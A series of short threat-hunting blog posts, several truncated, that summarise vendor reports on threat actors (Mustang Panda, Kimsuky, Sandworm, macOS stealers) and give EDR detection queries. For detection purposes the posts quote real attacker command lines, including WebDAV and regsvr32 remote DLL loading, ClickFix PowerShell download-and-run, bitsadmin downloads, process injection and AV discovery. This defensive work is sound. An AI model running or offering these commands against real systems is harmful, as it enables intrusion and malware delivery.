Know Your Adversary

Hello everyone! I think you are aware of abusing ftp.exe for data exfiltration. But what about command execution? Cado Security Labs shared information on malicious activity attributed to Mustang Panda (we track this cluster as Horned Werewolf). In this campaign the adversary leveraged a very interesting technique -  abused ftp.exe to execute an FTP script inside the disguised PDF file: C:\Windows\System32\ftp.exe -s:"แบบตอบรับ.pdf" Of course, if you'll look for ftp.exe executions with -s parameter, you face lots of false positives (still acceptable for your threat hunting missions!), so you should focus on PDF and other file types, which are not common to contain commands or scripts: event_type: "processcreate" AND proc_file_name: "ftp.exe" AND cmdline: ("s" AND "pdf") Despite the fact the threat actors choose such creative approach, the installation routine is still quite noisy and includes, for example, dropping an executabl...

Hello everyone! Let's talk about threat hunting this time. What's the difference between threat detection and threat hunting? When you're writing detections, there must be very low false positive rate, when you're hunting, the query output should include lots of noise - it allows you to uncover threats, which we not detected. One of my favourites for threat hunting missions - rundll32.exe abuse. It's EXTREMELY common. Let's look at a recent Ghostwriter campaign described in this report by SentinelLABS. So, the adversary actively abused rundll32exe to execute malicious DLLs. Here are some procedure examples: rundll32.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\bruhdll32.dll",FckUDud rundll32.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\bruhdll32.dll",HelloWorld rundll32.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\bruhdll32.dll",FCKU rundll32 "C:\Users\<USER>\AppData\Roaming\Microsoft\SystemCert...

Hello everyone! Recently we observed an activity cluster, which leveraged NetExec during post-exploitation. It's an open source tool for network service exploitation with LOTS of features. You can learn more about the tool here . From detection perspective it's also interesting. Today we'll cover only process creation events related to execution of the tool on the compromised system. I often tell you to look at metadata to spot renamed tools - but this time it's not the case as NetExec file doesn't have it. At the same time, it has lots of interesting command line arguments, but some of them are very noisy, so, based on my testing, here's the query: event_type: "processcreate"  AND  cmdline.keyword:/.* (smb|ldap|winrm|mssql|rdp|wmi|nfs) .*/  AND  cmdline: ("u" AND "p")  AND  cmdline:("zerologon" OR "nopac" OR "printnightmare" OR "smbghost" OR "ms17-010" OR "coerce_plus" OR ...

Hello everyone! Today we'll look at PebbleDash malware behaviors and how to detect it. This backdoor is actively used by Kimsuky (we track this activity cluster as Monolithic Werewolf). Let's look inside this  report. The adversary distributed phishing emails with EGG files attached. Not a common choice, right? That's not all. The EGG file contains a PIF file - a binary configuration file for the DOS emulator/simulator in Windows! Such files are not very common, so we can start from hunting for any executions of PIF files: event_type: "processcreate" AND  proc_file_name.keyword:/.*\.pif/ The file drops and opens a PDF file, as well as drops and executes another PIF file - PebbleDash backdoor, which abuses reg.exe for persistence in the compromised system.  Here we have a few detection opportunities. The first one - a PIF file opens a PDF file: event_type:"processcreate" AND proc_p_file_path.keyword:/.*\.pif/  AND  cmdline.keyword:/.*\.pdf/ The next one...

Hello everyone! Today we'll talk about another interesting technique - Forced Authentication (T1187). It also doesn't have many procedure examples in MITRE ATT&CK. One of the activity clusters we track, Sticky Werewolf, abuses this technique quite often. The adversary distributes phishing emails with malicious documents, which contain a resource that is automatically loaded when it is opened. Using this trick the threat actors obtain authentication material! Many documents have a very low detection rate, for example, this one . So, how can we detect or hunt for such malicious activity? We can seacrh for outbound network connections with destination port 445 (you may also add 137 and 139) originated from winword.exe or excel.exe (you can add PowerPoint): event_type: "networkconnection"  AND  net_conn_direction: "outbound"  AND  net_dst_port: "445"  AND  proc_file_path: ("winword.exe" OR "excel.exe") Of course, you may face ...

Hello everyone! I think it's not a secret that many adversaries leverage crypters to evade defenses. But some crypters not only encrypt and obfuscate maicious code, but also have intersting behaviors we can use for detection engeneering! Let's look at CypherIT - a very popular crypter, which used to be sold on underground resources, and used by lots of various threat actors worldwide (for example, Sticky Werewolf). The first behavior example we'll look at is abusing findstr for AV discovery: findstr /I "opssvc wrsa" findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" To detect it, search for findstr executions with AV/EDR names in command line (you can expand this list, of course): event_type: "processcreate"  AND  proc_file_name: "findstr.exe"  AND  cmdline: (*wrsa* OR *opssvc* OR *avastui* OR *avgui* OR *nswscsvc* OR *sophoshealth* OR *bdservicehost* OR *ekrn*) Next noteworthy behavior - dropping and executing renamed A...

Hello everyone! Today we'll talk about Dead Drop Resolver sub-technique (T1102.001), and how to detect it, of course. We'll look at how ACRStealer abusing it, as seen in this report by AhnLab. So, the stealer uses three services to obtain the list of C2: Steam Telegraph Google Docs Ok, in order to detect suspicious activity, we need to find DNS requests related to this services, but not from common applications, for example, Steam, web-browsers, etc. It also depends on your EDR as some of them may not collect all DNS requests made from browsers, so you don't need to exclude it. In my case Steam has the longes list of exclusions as it includes games, VPN clients, etc (make note that browsers are excluded by default): event_type: "dnsreq"  AND dns_rname: "steamcommunity.com"  AND NOT  proc_file_path: ("steam.exe" OR "steamwebhelper.exe" OR "vrwebhelper.exe" OR "cs.exe" OR "avp.exe" OR "wire.exe" ...

Hello everyone! We already talked about macOS stealers, but let's talk a bit more about this threat. Today we'll look at Poseidon Stealer and some of its anti-analysis techniques. So, the first technique we'll look at is abusing pkill to terminate processes related to Terminal : pkill Terminal To detect it, we can search for pkill process creation events with Terminal in arguments: event_type: processcreate AND proc_file_name: "pkill" AND cmdline: "Terminal" The second thing we'll look at - abusing AppleScript to check for common user names to identify analysis environment and terminate execution: osascript -e 'if (short user name of (system info)) is "maria" or (short user name of (system info)) is "run" or (short user name of (system info)) is "jackiemac" or (short user name of (system info)) is "bruno" then error number -1' Here we can search for osascript process creation events with those user ...

Hello everyone! Let's talk about recently uncovered techniques leveraged by Bloody Wolf activity cluster. The threat actors rely on phishing emails and distribute legitimate PDF file with malicious links. These links are used to deliver malicious JAR files. They used to distribute STRRAT, but in recent campaigns changed it to legitimate remote access software commonly abused by various adversaries - NetSupport. Details are available in the report , but let's look at some of detection opportunities. The victim clicks the phishing link and downloads a JAR file. Usually, it's located under Downloads folder. What about execution? Java is used to execute it, usually with -jar parameter. What's more, user must execute it, so the parent process for Java should be explorer.exe . Here's what we got: event_type: "processcreate"  AND  proc_p_file_path: "explorer.exe"  AND  cmdline:("java" AND "jar" AND "Downloads") To get the...

Hello everyone! Let's talk a bit about tunneling tools. They are extremely common nowadays. I think, everybody heard about Ngrok, right? But what about less common tools? Activity cluster we track under the name Dirty Wolf is constantly using the following tunneling tool - Localtonet. The cluster is involved in ransomware attacks and leverages leaked LockBit 3.0 builder to generate payloads. So, let's look at Localtonet detection opportunities. As always, we can look at executable files' metadata to cover renaming as well as command line parameters (usually it's just " authtoken "): event_type: processcreate AND proc_file_originalfilename:"localtonet.dll" AND cmdline:"authtoken" If the adversary uses Localtonet infrastructure (and it's a very common case), we can build detection logic based on DNS queries (make sure you exclude security solutions): event_type: "dnsreq" AND dns_rname: ("localto.net" OR "localtone...

Hello everyone! Let's talk about another sub-technique without any procedure examples - System Binary Proxy Execution: Mavinject (T1218.013). In the report on recent Mustang Panda activity (they track this cluster under the name Earth Preta, we call it Horned Werewolf), Trend Micro shared how the adversary abused Mavinject.exe to inject malicious code to a running process and bypass ESET detection (but my testing shows that current version of ESET detects it). To do so, the threat actors use  Mavinject.exe with /INJECTRUNNING parameter, for example: "C:\Windows\SysWOW64\Mavinject.exe" 5928 /INJECTRUNNING "C:\Users\Alice\Desktop\dc673d59a6a9df3d02e83fd03af80e117bea20954602ae416540870b1b3d13c4.dll" To detect it, let's use the parameter and Mavinject's original file names (adversaries may rename it!): event_type: processcreate  AND  proc_file_originalfilename:("mavinject32.exe" OR "mavinject64.exe")  AND  cmdline:"INJECTRUNNING...

Hello everyone! Securonix presented a fresh report on recent Kimsuky activity (as you remember, we track this cluster as Monolithic Werewolf). The adversary keeps distributing malicious LNK files and abusing PowerShell, and this time leverages Dropbox. Despite the fact the attack chain is very sophisticated and has multiple stages, there's a quick win from detection perspective.  So, the thing I want to note is abusing PowerShell to download the next stage from Dropbox. This activity includes quering the following domain name: "dl.dropboxusercontent.com". Of course, we can use this knowledge for detection: event_type: "dnsreq" AND proc_cmdline:/.*powershell.*/ AND  dns_rname: "dl.dropboxusercontent.com" And yes, this simple detection logic allows us to catch an advanced threat actor! That's it! See you tomorrow!

Hello everyone! Let's talk about one of my favorite topics - ransomware. And yes, one more time - about PowerShell abuse! Just before ransomware deployment (but in some cases much earlier), adversaries usually need to collect information about remote systems. If you ever responded to a modern ransomware attack, you should have seen this PowerShell commands as seen in Picus report : "powershell" -Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName" But what if there is no ActiveDirectory module? Of course, the threat actors try to install it, and it's a great detection opportunity: "powershell" -Command "ServerManagerCmd.exe -i RSAT-AD-PowerShell ; Install-WindowsFeature RSAT-AD-PowerShell ; Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0'" I think it's obvious how to detect such behaviour - just focus on the module name, that's it. ...

Hello everyone! Let's look at another curious case of PowerShell abuse. This time adversary used it for data collection and exfiltration. I took the following examples from eSentire report on RedCurl (we track this activity cluster as Red Wolf ).   The first example shows how the adversary uses 7-Zip to archive collected data: powershell -c "gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack = $.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;" Look at that variable name - $syspack . The cluster loves this name and also used it for naming Z-Zip binary. From detection perspective, you can focus on PowerShell executions with " gci " ( Get-ChildItem ), " .exe " and " 7za ", as well as command line parameters commonly used by the threat actor with 7-Zip - " x ", " -aoa ", " -p " and ...

Hello everyone! Let's talk about another MITRE ATT&CK technique, which don't have many procedure examples - T1127: Trusted Developer Utilities Proxy Execution. In a campaign, tracked by Elastic Security Labs as REF7707 , the adversary abused Microsoft Console Debugger to execute malicious shellcode. The tool was renamed to  fontdrvhost.exe and used to execute shellcode delivered in the config.ini file: C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe So, what to look for: Executables with " CDB.Exe " as original file name, but not actual file name Microsoft Console Debugger executions with -cf arguments Also, you may focus on  -pd -pn arguments as it enables adversary to run a shell command. See you tomorrow!

Hello everyone! Today we'll look at another example of an Advanced Persistent Threat, and how easy in reality is to detect related malicious activity. Microsoft Threat Intelligence have published a report on Seashell Blizzard - a high-impact threat actor that conducts global activities ranged from espionage to information operations and cyber-enabled disruptions. Let's explore one of exploitation patterns, which involves vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). First, the threat actors abused bitsadmin to download Atera installer: bitsadmin /transfer debjob /download [link_to_installer] C:\ProgramData\temporary.msi This is a very common malicious behaviour observed even in various ransomware cases. They also abused curl to solve the same task: curl -o setup.msi In both cases the adversary downloaded the agent from *atera.com domains, so you can focus on it with conjunction to bitsadmin and cur...

Hello everyone! Have you ever seen adversaries use WebDAV servers to host malware? Yes, of course! So today we're going to look and detection opportunities related to such activity. Let's look at recent Strela Stealer infection chain, presented by Unit42 . The threat actors distributed the stealer through email attachments of zip archives containing JS files. So, the JS file executes the following script: cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\\invoice.pdf && cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll Ok, the threat actors abuse PowerShell, but not for malware downloading, but to download and save a decoy document.  Next, the most interesting thing - using WebDAV. Here's what to look for: Execution of  net with " use " and " davwwwroot " i...

Hello everyone! Have you ever detected Microsoft KMS activation tools during your security operations? Yes? Me too! But not all tools are as harmless as one may think!  EclecticIQ analysts presented a report on recent Sandworm campaign, where the threat actors used trojanized Microsoft KMS activation tools to deliver BACKORDER loader. If you look through the report, the first thing you notice - BACKORDER is quite noisy. For example: It abuses wmic to add Microsoft Defender exclusion path and collect information on system's network adapter configuration It abuses reg to collect information on Microsoft Defender AntiSpyware feature state It abuses sc query to collect information about Microsoft Defender related service The funny thing - it's expected behavior for KMS activation tools! What's is more, Dark Crystal RAT is masquaraded to look like a KMS activation tool: C:\Users\User\AppData\Roaming\kms2023\kms2023.exe ! Thankfully, there's another copy located into C:\...

Hello everyone! Today we'll talk about a sub-technique of T1505 - T1505.004: IIS Components. Again, it doesn't have lots of procedure examples in MITRE ATT&CK, so I'm exited to see it leveraged by real adversaries! Recently Trend Micro published a report on a Chinese-speaking threat actor, which manipulates SEO to display unauthorized ads and distribute malware. To do it, the adversary exploited vulnerable IIS servers in order to install BadIIS. Let's look at some detection and hunting opportnities. Let's start from stopping and starting IIS services. The adversary uses iisreset /stop and iisreset /start . Next, the threat actors abused AppCmd to install BadIIS. So, it's a good idea to hunt for suspicious executions of appcmd.exe with install module . Also, the adversary may want to modify the file attributes of BadIIS abusing  attrib , for example, with the folowing parameters: +a +s +r +i +h . See you tomorrow!

Hello everyone! I'm sure you at least heard about Kimsuky group (we track this activity cluster under the name Monolithic Werewolf). According to  AhnLab , in a recent campaign the adversary started to use custom-made RDP Wrapper. So, RDP Wrapper is used by the threat actors to enable concurrent RDP connections to the compromised system. Of course, this utility has lots of detection opportunities. For example, it has a few intersting strings in its metadata: " RDPWInst.exe ", " RDPWInst ", " RDP Wrapper Library Installer ", etc. Next, it creates " RDP Wrapper " folder and drops two files there: " rdpwrap.ini " and " rdpwrap.dll ". Also, it modifies  HKLM\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll value to " %ProgramFiles%\RDP Wrapper\rdpwrap.dll ". It's not the first time an adversary uses this tool, so make sure you can detect such activity! See you tomorrow!

Hello everyone! Today we'll talk about MSBuild.exe and trusted developer utilities proxy execution (T1127.001). There isn't many procedure examples in MITRE ATT&CK, so it's quite interesting to spot such examples in-the-wild. In a recent campaign (check Cyble report for more details) adversaries distribute ZIP archives with LNK files (masquaraded as a PDF) and XML project file (masquaraded as a PNG) to deliver malware to the compromised system. LNK opening leads to copying the file " logo.png " to " %temp%\darkmoon.xml " and creates a scheduled task named " Darkmoon Gaming ", which runs every 15 minutes. The task runs the follwing command: cmd.exe /c powershell -nop -w h Start-Process [path_to_MSBuild.exe]\MSBuild.exe [path_to_temp]\darkmoon.xml By the way, even in this case the threat actors abuse PowerShell - it's extremely popular! As for MSBuild.exe, one more time - focus on suspicious file extensions and locations! That's it!...

Hello everyone! Today we'll look at another example of PowerShell abuse. The SonicWall Capture Labs threat research team reported on a curious Outlook email address stealer written in PowerShell.  The stealer is downoaded to the compromised system via an HTA-file delivered via phishing. Installation phase is quite noisy as always. For example, mshta.exe is communicating with  amazonaws[.]com , PowerShell is executed with  -ExecutionPolicy Bypass , the script itself contains interesting strings, for example, InvokeCommand.ExpandString('$env:APPDATA\Microsoft\.Outlook') . So, lots of detection opportunities! Also, looks like it's just the first stage - and it's the best place to detect if you failed to prevent! See you tomorrow!

Hello everyone! What do you know about macOS stealers? Looks like one can buy it on underground resources. And yes, we're seeing it in-the-wild more and more often! But we are interested in detection opportunities, of course! Let's look at a report published by Unit42. There's an overview of three stealers: Atomic Stealer, Poseidon Stealer and Cthulhu Stealer. If we look through the report, we can see a very distinct feature: all of them abuse AppleScript to obtain the victims' password! So, what to look for? Look for osascript executions with  display dialog and password in the command line! That's it! That easy! See you tomorrow!

Hello everyone! Let's talk a bit about macOS malware! Not very common, I know. And that's why very interesting! Recently SentinelOne published a report on macOS malware called FlexibleFerret. Let's look at some detection and hunting opportinities. The first thing that caught my eye is the domain:  zoom.callservice[.]us . Adversaries often masquarade domains they use to look like legitimate, so it's always a great idea to hunt for suspicious domains, which contain names of popular applications. Here we have Zoom, but you can search for Teams, Skype and other similar apps as well. Next thing - persistence, of course! As always, threat actors choose VERY common mechanisms - this time LaunchAgents. Again, masquaraded to look like Zoom ( com.zoom.plist ), but points to...  /private/var/tmp/logd ! Doesn't look like Zoom, right? So, this time it's a bit more difficult to spot malcious activity, but if you know where to look - quite possible! See you tomorrow!

Hello everyone! In our recent research we looked at a Nova Stealer (it's a SnakeLogger fork) campaign targeting CIS. It is noteworthy that the threat actors don't care much about masquerading: they do not use double file extensions or fake icons to make the malicious file appear as a legitimate document. From the detection perspective, it's quite straightforward: Uses  Add-MpPreference to bypass Windows Defender Uses  schtasks.exe for creating a scheduled task Gets IP and country details using  checkip[.]dyndns[.]org or reallyfreegeoip[.]org As always, those are just a few detection opportunities, there're more!  See you tomorrow!

Hello everyone! I keep collecting interesting PowerShell abuse examples observed in-the-wild. Recently I spotted another one reading this report . In this case the threat actors leveraged PowerShell to create a scheduled task: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\<USER>\AppData\Roaming\9secur32_5.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C51CED40-3F5F-4FAF-E44D-E40FBA838523}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" It's not uncommon persistence mechanism, but I don't often see adversaries uses those cmdlets. As you can see, the task masqueraded to look like Microsoft ...

Hello everyone! Everybody loves free courses, right? Have you missed a free course on Google Threat Intelligence ? If the answer is "Yes", it's your chance to check it!  I like this course as it not only overviews the capabilities of Google Threat Intelligence as a product, but also covers various threat intelligence use cases, for example, how to empower incident response and forensic investigations or how to use it for adversary hunting and tracking. I've already got my completion badge: What about you? See you tomorrow!

Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common, I'm not sure about ClickFix, but DarkGate is used by adversaries even is CIS. Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs . The chain starts from a malicious Google ad. If the victim clicks it, he or she sees a fake “Verify you are human” page. After checking the box, the victim sees the instructions on how to launch the Run dialog and paste a malcious PowerShell script: cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092" As you can see, the threat actors added an interesting string to make the "verification" look more legitimate. You definitely can use it for detection! If we decode Base64, we can see very common cmdlets used by adversaries for downloading and running malicious files: " Invoke-WebRequest " and " Start-Process ". So, this is another detection oppo...